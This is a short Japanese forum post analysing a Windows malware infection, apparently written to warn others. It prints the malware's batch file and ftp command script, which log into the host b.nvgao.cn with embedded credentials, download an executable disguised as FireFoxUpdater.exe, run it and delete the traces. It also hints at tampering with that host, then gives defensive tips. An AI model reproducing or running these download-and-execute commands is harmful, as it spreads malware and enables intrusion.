09/01/15 14:03:09
>>341続き
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)